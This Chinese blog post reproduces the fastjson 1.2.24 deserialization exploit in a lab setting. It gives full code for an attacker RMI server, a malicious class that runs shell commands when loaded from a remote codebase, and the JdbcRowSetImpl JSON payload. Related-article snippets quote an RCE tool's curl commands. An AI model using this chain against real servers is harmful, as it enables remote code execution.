rmi 反序列化漏洞_基于fastjson的反序列化漏洞攻击对rmi认识

最新推荐文章于 2024-08-01 21:02:14 发布
最新推荐文章于 2024-08-01 21:02:14 发布
阅读量593 收藏
点赞数
文章标签: rmi 反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42361622/article/details/111893447
版权

1.在fastjson发布反序列化漏洞后,一般都是将maven依赖更改位最新的修复版本,没有对其漏洞进行分析,也没有对rmi有太多了解,以此记录。

2.模拟攻击

准备条件:

mac、windows,fastjson<1.2.24

3.编写rmi服务器

rmi由攻击者编写,使其提供class文件用以加载。

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.NamingException;

import javax.naming.Reference;

import java.rmi.AlreadyBoundException;

import java.rmi.RemoteException;

import java.rmi.registry.LocateRegistry;

import java.rmi.registry.Registry;

public class RmiServer {

public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {

System.setProperty("java.rmi.server.hostname","192.168.1.121"); //这里用以公网访问

Registry registry = LocateRegistry.createRegistry(1099);

registry.bind("TouchTestFile",new ReferenceWrapper(new Reference("TouchTestFile","TouchTestFile",

"http://192.168.1.121:80/")));

System.out.println("rmi启动完成 " + registry.toString());

}

}

4.编写反序列化的pojo对象

import javax.naming.Context;

import javax.naming.Name;

import javax.naming.spi.ObjectFactory;

import java.io.File;

import java.io.IOException;

import java.util.Hashtable;

public class TouchTestFile implements ObjectFactory {

static {

try {

Runtime runtime = Runtime.getRuntime();

runtime.exec("cmd /C mkdir temp",null,new File("C:"));

Thread.sleep(1000L);

runtime.exec("cmd /C type nul>c.h",null,new File("C:\\temp"));

} catch (IOException | InterruptedException e) {

e.printStackTrace();

}

}

@Override

public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable, ?> environment) throws Exception {

System.out.println("攻击完成");

return null;

}

}

5.编译pojo对象,并为其提供下载地址,我这里使用mamp的apache服务器,使用其他完全没问题,只要提供下载即可。

将得到的class文件放到web目录下。

6.以上我是在mac上完成的,模拟攻击者制作的攻击条件,现在需要在被攻击的电脑上编写客户端。

windows下的客户端代码:

package com.cocos;

import com.alibaba.fastjson.JSON;

public class App

{

public static void main( String[] args )

{ //高版本的jdk可能没有开启url加载

System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");

//构造攻击的json数据

//这里的192.168.1.121:1099是rmi服务器的地址与端口

String json = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://192.168.1.121:1099/TouchTestFile\",\"autoCommit\":true}";

JSON.parseObject(json);

}

}

7.环境完成,测试

Kinetic AC
关注
什么是RMI,为什么要使用RMI框架?
learning__java的博客
06-27 1万+
这里是修真院后端小课堂,每篇分享文从 八个方面深度解析后端知识/技能,本篇分享的是: 【什么是RMI,为什么要使用RMI框架?】 大家好,我是IT修真院深圳分院第10期的JAVA学员,一枚正直纯洁善良的java程序员。 今天给大家分享一下,修真院官网Java任务8,深度思考中的知识点—什么是RMI,为什么要使用RMI框架? 1.背景介绍 什么是RMI RMI是Java的一组拥护开发分布式应用程序的...
如何保护企业网络免受DDoS攻击?—Vecloud微云
vecloud的博客
09-21 135
使DNS服务器成为放大攻击的目标选择的原因在于,它们的Internet基础结构旨在每分钟处理数百万个请求,并连接到高带宽链接以处理这种流量。 因此,犯罪者利用DNS服务器行为来放大攻击,并将最初的小查询转变为较大的有效负载,从而使服务器停机。 DNS服务器负责将域名解析为IP地址。DNS放大攻击将带有被攻击者的伪造IP地址的DNS查询发送到一个开放的DNS解析器,提示其使用DNS响应来回复该地址。随着大量虚假查询的发出,网络很快就会被大量的DNS响应所淹没。大量的虚假流量将使网络变慢或产生不存在的连接。 .
【网络安全】漏洞挖掘之一次反序列化漏洞学习
最新发布
2301_77472496的博客
08-01 944
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。头脑简单的笔者一开始认为这次又是添加了什么白名单,就在各种blacklist中疯狂寻找,无果,郁闷了半天。理论上讲找个类替代MarshalledObject的功能即可完成绕过,但这次并没有这么做,而是引出了一种比较有意思的反序列化漏洞RMI反序列化漏洞(关于这个系列的漏洞,笔者打算单独开个板块进行分析)。
Fastjson反序列化漏洞
xhscxj的博客
10-22 1404
fastjson是阿里的开源JSON解析库提供两个主要方法和来分别实现序列化和反序列化操作,被爆出两个远程命令执行漏洞,为2017年1.2.24版本和2019年1.2.47版本。
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl
liu649983697的专栏
05-30 1547
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击
fastjson 序列化 不包括转义字符_Fastjson 反序列化漏洞自动化检测
weixin_39542936的博客
10-24 395
fastjson 是 java 中常用的一个用来序列化反序列化 JSON 数据的库。因其优异的性能表现,在 java web 开放中应用比较广泛。最近需要写一个 fastjson 的检测插件,稍微研究了一下后,感觉有一个比较不错的检测方法,在这里和大家分享下。在文章开始之前我想说明一点这里介绍的是检测方法而不是利用方法。这是两个不同的目标实现这两个目标需要考虑的细节也是不同的。在做漏洞检测时尤其是...
fastjson 1.2.24反序列化漏洞
weixin_68547367的博客
01-04 1261
fastjson是一个Java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到了极致,它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景中。在网络传输的过程中,RMI中的对象是通过序列化方式进行编码传输的,这意味着,RMI在接收到经过序列化编码的对象后进行反序列化。java.io.Serializable:表示序列化,是一个空接口,也就是说这个接口没有声明任何的方法,所以实现这个接口的类也就不需要实现任何的方法。
Fastjson反序列化漏洞原理与复现_fastjson反序化漏洞解决(1)
m0_60575487的博客
04-07 689
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3413
Fastjson 1.2.47反序列化漏洞复现
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4540
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1180
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
rmi远程代码执行漏洞_Fastjson 1.2.47 远程命令执行漏洞 - 漏洞环境
weixin_39686192的博客
12-22 145
Fastjson 1.2.47 远程命令执行漏洞Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。参考链接:漏洞环境访问http://your-ip:8092即可看到一个json对象被...
rmi远程代码执行漏洞_Fastjson 1.2.47 远程命令执行漏洞
weixin_39919195的博客
12-22 428
各位大佬,最近好么由于找工作,以及适应新环境,导致快3个月没有更新文章了,感觉有点对不住大家。话不多说,今天带大家复现一下Fastjson1.2.47远程命令执行漏洞漏洞实现流程准备环境本次漏洞复现需要有三台设备(两台也可以)主机A:模拟Fastjson漏洞环境(centos7)主机B:模拟攻击机,需要开启web服务(windows10)主机C:搭设RMI服务(可以同主机B配置在一起,我的环境是...
rmi远程代码执行漏洞_Fastjson远程代码执行漏洞复现
weixin_36088083的博客
12-31 390
fastjson漏洞简介Fastjson是一个Java库,可用于将Java对象转换为其JSON表示形式。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。fastjson漏洞原理先来分析fastjson 1.2.47的POC{"a": {"@type": "java.lang.Class","v...
对于fastjsonrmi利用问题的解决
2301_79724395的博客
05-14 700
也是被一个问题困扰了好久,都要崩溃了,就为了一个问题调试半天的代码,最后终于解决了,现在做一个记录,幸好没有放弃,感觉学java是比较慢的,但是学java就是重在分析能力的提升,所以慢也没有关系当然,自己尝试的方法远远不止这些,调试了很多。所以如果自己更清楚这个过程的话,知道过程的关键点就会容易得多。
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 3323
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
远程RMI调用接口时传JSON类型参数失败的解决办法
guodongCC322的博客
05-12 1291
一般情况下,远程调用接口时传的参数类型必须是经过序列化之后的类, 因为数据要在网络间传输,需要进行序列化,所以一般需要在接口间传递的对象都要实现Serializable接口,一些常用的String,int,long这些数据类型基本上都没有问题,不过在传json字符串的时候有时候就会报下面这个错误: java.io.NotSerializableException: net.sf.json.JSO
Fastjson反序列化漏洞分析
热门推荐
fly小灰灰的专栏
07-30 1万+
1. 漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本: fastjson <= 1.2.24 2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
RMI反序列化漏洞 修复
06-08
RMI反序列化漏洞是一种常见的Java Web应用程序漏洞攻击者可以利用该漏洞在目标服务器上执行任意代码。该漏洞利用的核心是Java的反序列化机制,攻击者可以通过构造特定的序列化对象来触发漏洞。 要修复RMI反序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值